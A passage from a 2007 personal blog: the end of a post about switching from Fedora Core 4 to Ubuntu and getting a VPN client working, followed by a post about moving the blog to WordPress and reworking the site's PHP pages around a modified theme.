The only thing left to do was my VPN connection, since I do a lot of my work-work from home. VPN client installation on FC4 was also a bit involved; good thing I kept notes. Following those notes, I downloaded, compiled and installed the VPN client. It's working now, and I can connect to work just like I did on FC4, with one difference: on Ubuntu I have to start the VPN client with sudo. I have yet to find out why and, more importantly, how to solve this. But since I can work fine, the issue is not that pressing.

Now, I am a happy Ubuntu user (and an ex-FC user). I still have to set up my SFTP server, check how my digital camera and camcorder work, etc. But with Synaptic, package management is very easy in Ubuntu, so I am sure these won't be that big a deal. Still, wish me luck.

Monday, October 15, 2007

New look!

I never blogged seriously. I had a blog, which I called an online journal, running on blogging software I hand-rolled myself. It worked moderately OK for my seldom blogging. I didn't have too many requirements, so it was quite spartan in terms of features. The presentation was done in XML with XSL; you can well guess it was a geeky piece of one-of-a-kind software.

Then I changed my hosting company. The new host came with blogging software, and not just one: you can choose from many. I don't expect to become an avid blogger suddenly, though I sure hope to become one. But I decided to install one of the blogging packages, any one, to see the features. The first one listed was Wordpress. I had heard the name, so I went with it. I don't regret it; actually, I am quite impressed with it. Playing with the themes there, I chose one called Almost-Spring. I liked it. I tweaked the color scheme a bit, customized the sidebar and footer, and borrowed the edited theme as the theme of my website. The change required changing the layout of all the pages. In order to do so, I recoded the PHP pages, so that the next time I need to change the look of the site, I don't need to change each individual file. So it has become a sort of home-brewed, one-of-a-kind CMS. Yes, it is deja vu all over again.

So what about my old blog postings? I could possibly hack Wordpress to post backdated entries. But I do not have too many posts that I care about, and most of them are not time-topical anyway; either way, it's not worth the time and effort to hack it. I can just cut and paste some of them into this new blog and change the world! Keep checking this space for some earth-shattering old blog posts. Till then, bye.